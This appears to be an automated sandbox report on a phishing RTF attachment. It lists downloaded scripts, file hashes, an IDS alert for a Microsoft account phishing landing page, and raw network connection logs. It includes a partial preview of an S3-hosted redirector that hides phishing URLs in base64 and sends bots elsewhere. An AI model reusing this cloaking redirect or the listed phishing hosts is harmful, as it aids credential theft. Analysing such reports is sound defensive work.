                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                      Category:downloaded
                                                                                      Size (bytes):89501
                                                                                      Entropy (8bit):5.289893677458563
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                      Malicious:false
                                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):3.990210155325004
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                      Malicious:false
                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:downloaded
                                                                                      Size (bytes):23
                                                                                      Entropy (8bit):3.7950885863977324
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YMEsRzHY:YMpF4
                                                                                      MD5:B8B6DD452D0E005E25156E1762DC7B6B
                                                                                      SHA1:C5854A9F7939A0A021B82B9CBA567C62AEC4F19D
                                                                                      SHA-256:A593F36B83247E4F7A26C1DEA51741D0A823040804D7DDAFDEF3B0E54AE3F089
                                                                                      SHA-512:1970BE7E0E318C2DFFC3D6B58B475A2D5438CA4D9F184841944E7A5734C666DC91BD55A2DD815612A7B7F101584F205E4920B900836F73C0F1129A46F7AD5626
                                                                                      Malicious:false
                                                                                      URL:https://api.ipify.org/?format=json
                                                                                      Preview:{"ip":"173.254.250.89"}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):47992
                                                                                      Entropy (8bit):5.605846858683577
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                      Malicious:false
                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 10 x 57, 8-bit/color RGB, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):4.022997040570905
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPlHGtlpIsoyxl/k4E08up:6v/lhP8tlms17Tp
                                                                                      MD5:565B6CD722C5E2369514359B6FAABEF0
                                                                                      SHA1:33E8CC51E0C98E1154D4C01EB8D2966118291EA3
                                                                                      SHA-256:1A33D7A79FB2557DEC68C407013EBB934EDDAB88EB17C73F5B3CA367462D2A42
                                                                                      SHA-512:80731451986EDB3CE539010E4A78F72EB947967D6684A38C4C235EBC171069BA91DBC705F5B130B45E83DBBE5238BA5454DE7FD4932A3490A41AB18547C098E1
                                                                                      Malicious:false
                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e30d87ec8a16c3f/1731690534483/YsSzfqJgTmO8M-E
                                                                                      Preview:.PNG........IHDR.......9.......-.....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):2038
                                                                                      Entropy (8bit):4.7445889455697365
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:OGc5JtjBn2NMNNMOVhKR+/g9bH0sqdp6LSJQZIeyhT:1cLRBSnOeI/gtH0s910hT
                                                                                      MD5:41DAD0B2FC99D22EBF4C2BE76918601C
                                                                                      SHA1:BFAFF4D2D4FBAD866B7AC8DDEBB1517D5445C049
                                                                                      SHA-256:591CD25376156922490FEDA57FF78648D79BD8E4B9595EABB17E5867C2612835
                                                                                      SHA-512:42A73216D6CC9479B00F5A5916D7742E83DA95BD3E7B1D39DFCB81C2FF0D094C640295A04F457089B2F20A38F755B816AF6D4706F69348A7C3ACA697ABE8D22D
                                                                                      Malicious:false
                                                                                      URL:https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html
                                                                                      Preview:....<html>.. <head>.. <style>.. /* Center the message on the screen */.. body, html {.. height: 100%;.. margin: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. font-family: Arial, sans-serif;.. background-color: #f4f4f4;.. }.... .message {.. font-size: 24px;.. font-weight: bold;.. }.... .loading-dots::after {.. content: '';.. animation: dots 1s steps(5, end) infinite;.. }.... @keyframes dots {.. 0%, 20% {.. content: '';.. }.. 40% {.. content: '.';.. }.. 60% {.. content: '..';.. }.. 80%, 100% {.. content: '...';.. }.. }.. </style>.... <script>.. var botUrl = 'aHR0cHM6Ly9mYWNlYm9vay5jb20';.. var originalUrl = 'aHR0cHM6Ly9nYW1ib2wuc21hcnRob3N0LnBsL2FtZGhjcnZpZXdwbXQ=';.... function detectAndRedirect() {.. var userAgent = na
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:downloaded
                                                                                      Size (bytes):243
                                                                                      Entropy (8bit):5.519627994406674
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:TMVBd/ZbZjZvKtWRVzj8v+82l31tPjkC/an:TMHd9BZKtWRivj+1VkC/a
                                                                                      MD5:1C20ED24300AA335BAF660BEAAF09C07
                                                                                      SHA1:7F71604AB013E8AA746CE3ABCE7A956CE5B70DB6
                                                                                      SHA-256:96CA9835DB61ED103623B8725DD6B9024BF232244B70E15477DF20CFEA67802F
                                                                                      SHA-512:CB0021606DCEBF4A874020FAA46956C1537F4412EA8DA2D2F23841DE3E70764441B6823D29BC2F92447B0F9238D08F0EB2A24BF441E1006EE4DF06A2FA776077
                                                                                      Malicious:false
                                                                                      URL:https://s3.eu-west-1.amazonaws.com/favicon.ico
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>YJ63PRYS3FZ3PJRQ</RequestId><HostId>xHU5IVcc970Hie/RP0Egi2pvhf05sd8/yzpH1JNbPHHEFxhehIyTnbQ4bGW3pbmsRTDetzqXHgo=</HostId></Error>
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):47992
                                                                                      Entropy (8bit):5.605846858683577
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                      Malicious:false
                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (47671)
                                                                                      Category:downloaded
                                                                                      Size (bytes):47672
                                                                                      Entropy (8bit):5.401921124762015
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                      MD5:B804BCD42117B1BBE45326212AF85105
                                                                                      SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                      SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                      SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                      Malicious:false
                                                                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                                      Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):3.990210155325004
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):40
                                                                                      Entropy (8bit):4.120950594454667
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YBAvZNAiDSABL4:YwZNP94
                                                                                      MD5:B09F000BFB98ABD880BC77E05456FFEA
                                                                                      SHA1:FBADFA7F41B709507692B8FCEA597474EED91E2C
                                                                                      SHA-256:0A721532497036FF7D8B228DD8D4EF5E91777B0BD2B11F49F5B2CCDDD55EB259
                                                                                      SHA-512:F2E0CF9FD6D14EAF9BE953052515A598E9F96186FB82D5FA8D3E9B01F9706284DE8DDDF343AB69CF566EDEB28C659D65E0D608F99A5717A7CBFB2CC48ADA15A7
                                                                                      Malicious:false
                                                                                      Preview:{"detail":"Method \"GET\" not allowed."}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text
                                                                                      Category:downloaded
                                                                                      Size (bytes):315
                                                                                      Entropy (8bit):5.0572271090563765
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                                      Malicious:false
                                                                                      URL:https://gambol.smarthost.pl/favicon.ico
                                                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):23
                                                                                      Entropy (8bit):3.7950885863977324
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YMEsRzHY:YMpF4
                                                                                      MD5:B8B6DD452D0E005E25156E1762DC7B6B
                                                                                      SHA1:C5854A9F7939A0A021B82B9CBA567C62AEC4F19D
                                                                                      SHA-256:A593F36B83247E4F7A26C1DEA51741D0A823040804D7DDAFDEF3B0E54AE3F089
                                                                                      SHA-512:1970BE7E0E318C2DFFC3D6B58B475A2D5438CA4D9F184841944E7A5734C666DC91BD55A2DD815612A7B7F101584F205E4920B900836F73C0F1129A46F7AD5626
                                                                                      Malicious:false
                                                                                      Preview:{"ip":"173.254.250.89"}
                                                                                      File type:Rich Text Format data, version 1, ANSI, code page 1252
                                                                                      Entropy (8bit):3.5728927921713796
                                                                                      TrID:
                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                      File name:Iamgold-PYMPATA Policy_Enrollment2024739441.rtf
                                                                                      File size:446'504 bytes
                                                                                      MD5:03cd3dab4456ae5017e9bf714a1e572a
                                                                                      SHA1:3d6df7276f2b01204e0ce523353bdc131e73ac3f
                                                                                      SHA256:0eba1169393c80b84b1a49a38e88fd9ab0ccd1c99e0f7249d77eddbd2f32a351
                                                                                      SHA512:713bae67e98dc03efcc9dc5aab29f9c68678618ffa7769f013cef088cb47baaac0a9f4a1726ca6536b85bf7efc6295b7d0797bfe3a0d7ebe862fa44b26d17754
                                                                                      SSDEEP:6144:sf0+TNapH4544Vm/5Bz3yrVOf1XES8+PyxFZizb74CHr:I0FY544mz3yZs
                                                                                      TLSH:04942FAEC11700F1E39781CD930B3A5F3A61FAAE8ED28D4316F9E2B9C6716D3C954506
                                                                                      File Content Preview:{\rtf1\ansi\ansicpg1252\uc0\stshfdbch1\stshfloch1\stshfhich1\stshfbi1\deff1\adeff0{\fonttbl{\f0\fnil\fcharset0 Arial;}{\f1\fnil\fcharset0 Times New Roman;}{\f2\fnil\fcharset0 userbri Light;}}{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red47\gr
                                                                                      Icon Hash:35e1cc889a8a8599
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-15T18:09:05.064151+01002828656ETPRO PHISHING Microsoft Live Account Verification Phishing Landing Nov 20 2017291.211.222.250443192.168.2.1662646TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 15, 2024 18:08:40.185980082 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:40.487747908 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:41.092622042 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:42.298630953 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:43.200359106 CET4968980192.168.2.16192.229.211.108
                                                                                      Nov 15, 2024 18:08:43.323775053 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.323946953 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.328864098 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.328950882 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.328984022 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.329031944 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.329163074 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.514286041 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:43.514344931 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.514534950 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:43.528378010 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:43.528393984 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.732903957 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733206034 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733216047 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733352900 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733362913 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733371019 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733424902 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.733424902 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.733426094 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.733697891 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.733994007 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.734002113 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.734071016 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.734222889 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.734276056 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:43.734338999 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.785644054 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:08:44.378715992 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.379112005 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.379148006 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.380649090 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.380727053 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.380737066 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.381035089 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.382765055 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.382888079 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.383065939 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.383074045 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.437658072 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.665277004 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.665349960 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.665544033 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.665638924 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.678165913 CET49707443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.678201914 CET4434970752.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.709656954 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:44.721985102 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.722035885 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:44.722112894 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.722636938 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:44.722656965 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.558243990 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.558525085 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:45.558554888 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.559048891 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.559993982 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:45.560090065 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.560132027 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:45.603348970 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.611633062 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:45.803961039 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.804096937 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.804152012 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:45.804877043 CET49713443192.168.2.1652.218.122.88
                                                                                      Nov 15, 2024 18:08:45.804897070 CET4434971352.218.122.88192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.260658979 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:46.260715008 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.260828018 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:46.262268066 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:46.262298107 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.738986015 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:46.739046097 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.739247084 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:46.739427090 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:46.739478111 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:46.739495039 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.739523888 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.741964102 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:46.742136002 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:46.742177963 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.193924904 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.194006920 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.195847034 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.195864916 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.196197987 CET4434971552.149.20.212192.168.2.16
